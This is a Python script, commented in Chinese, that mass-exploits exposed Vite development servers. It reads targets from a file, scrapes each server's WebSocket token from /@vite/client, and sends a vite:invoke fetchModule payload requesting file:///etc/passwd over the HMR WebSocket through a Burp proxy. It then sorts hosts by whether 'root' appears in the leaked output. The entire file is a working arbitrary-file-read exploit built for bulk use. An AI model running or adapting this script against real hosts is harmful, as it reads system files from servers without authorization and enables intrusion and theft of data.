#!/usr/bin/env python3 import asyncio import json import re import socket import ssl import urllib.request from pathlib import Path from urllib.parse import urlparse from websockets.asyncio.client import connect from websockets.exceptions import InvalidHandshake, InvalidStatus INPUT_FILE = "1.txt" BURP_HOST = "127.0.0.1" BURP_PORT = 8080 BURP_PROXY = f"http://{BURP_HOST}:{BURP_PORT}" USE_BURP = True CONNECT_TIMEOUT = 10 MESSAGE_TIMEOUT = 5 MAX_MESSAGES = 20 KEYWORD = "root" PAYLOAD = { "type": "custom", "event": "vite:invoke", "data": { "name": "fetchModule", "id": "send:1", "data": ["file:///etc/passwd?raw"], }, } def insecure_ssl_context() -> ssl.SSLContext: ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE return ctx def load_targets(path: str) -> list[str]: targets = [] file_path = Path(path) if not file_path.exists(): raise FileNotFoundError(f"找不到输入文件: {path}") for line in file_path.read_text(encoding="utf-8", errors="ignore").splitlines(): line = line.strip() if not line or line.startswith("#"): continue if ":" not in line: print(f"[SKIP] 格式不正确,应该是 host:port -> {line}") continue targets.append(line) return targets def safe_filename(target: str) -> str: return re.sub(r"[^a-zA-Z0-9_.-]+", "_", target) def fetch_vite_client_js(target: str, scheme: str) -> str: """ 请求 /@vite/client,提取 Vite 客户端 JS。 scheme 通常是 https。 """ host, port = target.rsplit(":", 1) origin = f"{scheme}://{host}:{port}" url = f"{origin}/@vite/client" headers = { "Host": f"{host}:{port}", "Origin": origin, "Referer": f"{origin}/", "User-Agent": ( "Mozilla/5.0 (Windows NT 10.0; Win64; x64) " "AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/147.0.7727.56 Safari/537.36" ), "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.9,en-GB;q=0.8,en;q=0.7", } handlers = [] if USE_BURP: handlers.append( urllib.request.ProxyHandler({ "http": BURP_PROXY, "https": BURP_PROXY, }) ) if scheme == "https": handlers.append(urllib.request.HTTPSHandler(context=insecure_ssl_context())) opener = urllib.request.build_opener(*handlers) req = urllib.request.Request(url, headers=headers) print(f"[+] Fetching {url}") with opener.open(req, timeout=CONNECT_TIMEOUT) as resp: body = resp.read().decode("utf-8", errors="replace") print(f"[+] {target} /@vite/client length: {len(body)}") return body def extract_ws_token(client_js: str) -> str: patterns = [ r'const\s+wsToken\s*=\s*["\']([^"\']+)["\']', r'let\s+wsToken\s*=\s*["\']([^"\']+)["\']', r'var\s+wsToken\s*=\s*["\']([^"\']+)["\']', r'wsToken\s*=\s*["\']([^"\']+)["\']', ] for pattern in patterns: match = re.search(pattern, client_js, re.S) if match: return match.group(1) idx = client_js.find("wsToken") if idx == -1: idx = client_js.find("token") if idx != -1: print("[!] 未能自动提取 wsToken,附近内容如下:") print(client_js[max(0, idx - 300): idx + 500]) raise RuntimeError("无法从 /@vite/client 中提取 wsToken") def open_burp_connect_tunnel(host: str, port: int) -> socket.socket: print(f"[+] Connecting to Burp: {BURP_HOST}:{BURP_PORT}") s = socket.create_connection((BURP_HOST, BURP_PORT), timeout=CONNECT_TIMEOUT) connect_req = ( f"CONNECT {host}:{port} HTTP/1.1\r\n" f"Host: {host}:{port}\r\n" "Proxy-Connection: keep-alive\r\n" "\r\n" ) s.sendall(connect_req.encode("ascii")) data = b"" while b"\r\n\r\n" not in data: chunk = s.recv(4096) if not chunk: s.close() raise RuntimeError("Burp closed connection before CONNECT response") data += chunk header_text = data.decode("iso-8859-1", errors="replace") first_line = header_text.splitlines()[0] if header_text.splitlines() else "" print("[+] Burp CONNECT response:") print(header_text) if " 200 " not in first_line: s.close() raise RuntimeError(f"CONNECT failed: {first_line}") s.settimeout(None) return s async def recv_multiple(ws) -> list[str]: messages = [] for i in range(MAX_MESSAGES): try: async with asyncio.timeout(MESSAGE_TIMEOUT): msg = await ws.recv() text = str(msg) messages.append(text) print(f"[RECV {i + 1}] {text!r}") except TimeoutError: print(f"[+] No more messages after {MESSAGE_TIMEOUT}s") break return messages def has_keyword(messages: list[str], keyword: str) -> bool: blob = "\n".join(messages) return keyword.lower() in blob.lower() async def send_ws_payload(target: str, scheme: str, ws_token: str) -> tuple[bool, list[str], str]: host, port_str = target.rsplit(":", 1) port = int(port_str) if scheme == "https": ws_scheme = "wss" else: ws_scheme = "ws" origin = f"{scheme}://{host}:{port}" referer = f"{origin}/" ws_uri = f"{ws_scheme}://{host}:{port}/?token={ws_token}" print(f"[+] Trying WS URI: {ws_uri}") try: if ws_scheme == "wss": if USE_BURP: tunnel_sock = open_burp_connect_tunnel(host, port) proxy_arg = None sock_arg = tunnel_sock else: proxy_arg = None sock_arg = None ctx = insecure_ssl_context() connect_kwargs = { "ssl": ctx, "server_hostname": host, "sock": sock_arg, "proxy": proxy_arg, } else: connect_kwargs = { "proxy": BURP_PROXY if USE_BURP else None, } async with connect( ws_uri, open_timeout=CONNECT_TIMEOUT, close_timeout=5, ping_interval=None, origin=origin, subprotocols=["vite-hmr"], compression=None, user_agent_header=( "Mozilla/5.0 (Windows NT 10.0; Win64; x64) " "AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/147.0.7727.56 Safari/537.36" ), additional_headers={ "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.9,en-GB;q=0.8,en;q=0.7", "Referer": referer, }, **connect_kwargs, ) as ws: print(f"[+] {target} WebSocket HANDSHAKE OK") print(f"[+] Selected subprotocol: {ws.subprotocol}") message = json.dumps(PAYLOAD, ensure_ascii=False, separators=(",", ":")) print("[SENT]") print(message) await ws.send(message) messages = await recv_multiple(ws) return True, messages, "" except InvalidStatus as e: response = getattr(e, "response", None) err = "InvalidStatus" if response is not None: err = ( f"InvalidStatus status={getattr(response, 'status_code', None)} " f"reason={getattr(response, 'reason_phrase', None)}" ) return False, [], err except InvalidHandshake as e: return False, [], f"InvalidHandshake: {e!r}" except Exception as e: return False, [], f"{type(e).__name__}: {e!r}" async def check_one_target(target: str) -> dict: print("\n" + "=" * 80) print(f"[TARGET] {target}") result = { "target": target, "ok": False, "has_root": False, "messages": [], "error": "", } # 优先 https/wss;失败后再尝试 http/ws。 for scheme in ["https", "http"]: try: client_js = fetch_vite_client_js(target, scheme) ws_token = extract_ws_token(client_js) print(f"[+] {target} Extracted wsToken: {ws_token}") ok, messages, err = await send_ws_payload(target, scheme, ws_token) if not ok: print(f"[!] {target} {scheme} failed: {err}") result["error"] = err continue found = has_keyword(messages, KEYWORD) result["ok"] = True result["has_root"] = found result["messages"] = messages result["error"] = "" if found: print(f"[FOUND] {target} 有{KEYWORD}") else: print(f"[MISS] {target} 没有{KEYWORD}") return result except Exception as e: err = f"{scheme}: {type(e).__name__}: {e!r}" print(f"[!] {target} {err}") result["error"] = err continue return result async def main(): targets = load_targets(INPUT_FILE) print(f"[+] Loaded targets: {len(targets)}") root_found = [] no_root = [] failed = [] output_dir = Path("ws_results") output_dir.mkdir(exist_ok=True) for target in targets: result = await check_one_target(target) target_file = output_dir / f"{safe_filename(target)}.txt" if result["messages"]: target_file.write_text( "\n\n".join(result["messages"]), encoding="utf-8", ) else: target_file.write_text( result["error"] or "no messages", encoding="utf-8", ) if result["ok"] and result["has_root"]: line = f"{target} 有{KEYWORD}" root_found.append(line) print(line) elif result["ok"]: no_root.append(f"{target} 没有{KEYWORD}") else: failed.append(f"{target} | {result['error']}") Path("root_found.txt").write_text("\n".join(root_found), encoding="utf-8") Path("no_root.txt").write_text("\n".join(no_root), encoding="utf-8") Path("failed.txt").write_text("\n".join(failed), encoding="utf-8") print("\n" + "=" * 80) print("[SUMMARY]") print(f"Total: {len(targets)}") print(f"有{KEYWORD}: {len(root_found)}") print(f"没有{KEYWORD}: {len(no_root)}") print(f"失败: {len(failed)}") print("Saved: root_found.txt") print("Saved: no_root.txt") print("Saved: failed.txt") print("Saved messages dir: ws_results") if __name__ == "__main__": asyncio.run(main())